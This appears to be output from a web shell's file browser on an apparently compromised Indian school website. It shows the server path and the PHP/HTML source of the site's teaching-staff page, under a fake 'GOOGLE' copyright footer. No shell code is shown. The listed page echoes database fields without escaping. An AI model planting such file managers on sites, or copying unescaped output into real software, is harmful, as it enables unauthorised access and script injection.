GOOGLE

aku nok ndi : /home/astwardha/public_html/astwardha/astwardha.in/
File Up :
aku nok ndi : /home/astwardha/public_html/astwardha/astwardha.in/teaching.php

<!DOCTYPE html>
<html lang="en">
<!-- Mirrored from sdmca.edu.in/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 27 Sep 2018 18:21:24 GMT -->
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="author" content="">
  <title>Agnihotri School of Technology (Polytechnic) Wardha</title>
  <!-- core CSS -->
  <link href="css/bootstrap.min.css" rel="stylesheet">
  <link href="css/font-awesome.min.css" rel="stylesheet">
  <link href="css/animate.min.css" rel="stylesheet">
  <link href="css/prettyPhoto.css" rel="stylesheet">
  <link href="css/main.css" rel="stylesheet">
  <link href="css/responsive.css" rel="stylesheet">
  <link rel="shortcut icon" href="">
  <script >
   $(document).ready(function () {
    $("#background-image").fullscreenBackground();
  });
</script>
<!-- banner code end-->
<script src="js/slider.js"></script>
<script src="includePage.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
</head><!--/head-->
<body class="homepage">
<?php   include("header.php"); ?>
<section id="middle">
  <div class="container container_bg">
    <div class="row">
      <div class="col-sm-3 col-md-3 wow fadeInDown">
       <script >
        ajaxinclude("left_Site.html");
      </script> 
    </div><!--/.col-sm-6-->
    <h1 style="color: red;">Teaching Staff</h1>
    <hr/>
    <div class="col-sm-8 col-md-9 wow fadeInDown">
      <section id="middle">
        <div class="container container_bg">
            <div class="row">
               
<style type="text/css">
#deceased{
    background-color:#FFF3F5;
    padding-top:10px;
    margin-bottom:10px;
}
.remove_field{
    float:right;    
    cursor:pointer;
    position : absolute;
}
.remove_field:hover{
    text-decoration:none;
}
</style>
<!--Table-->
<div class="table-responsive">
<table class="table table-striped w-auto" border="1">
  <!--Table head-->
  <thead>
    <tr>
      <th>Sr.No.</th>
      <th>Name</th>
      <th>Education</th>
      <th>Department</th>
      <th>Email</th>
      <th>Image</th>
    </tr>
  </thead>
  <tbody>
    <?php $sql = mysqli_query($con, "SELECT * FROM `staff` WHERE `teacher_status`='Teaching' ORDER BY sort ASC");
    $i=1;
    while($row = mysqli_fetch_array($sql)){?>
    <tr class="table-info">
      <td><?php echo $i;?></td>
      <td><?php echo $row['name'];?></td>
      <td><?php echo $row['education'];?></td>
      <td><?php echo $row['department'];?></td>
      <td><?php echo $row['email'];?></td>
      <td><img src="uploadedImage/faculty/<?php echo $row['image'];?>" width="100" height="100"></td>
    </tr>
<?php $i++; }  ?>
  </tbody>
  <!--Table body-->
</table>
</div>
<!--Table-->
            </div><!--/.row-->
        </div><!--/.container-->
    </section>

</div>
</div>     <br>
 
     </div>
   </div><!--/.row-->
 </div><!--/.container-->
</section><!--/#middle-->
<!--/#content-->
<!--/#partner-->
<!--/#conatcat-info-->
<!--/#bottom-->
<script >
  ajaxinclude("footer.html");
</script> 
<!--/#footer-->
<script src="js/jquery.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/jquery.prettyPhoto.js"></script>
<script src="js/jquery.isotope.min.js"></script>
<script src="js/main.js"></script>
<script src="js/wow.min.js"></script>
</body>
<!-- Mirrored from sdmca.edu.in/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 27 Sep 2018 18:25:12 GMT -->
</html>

Copyright © 1945 - 2024 GOOGLE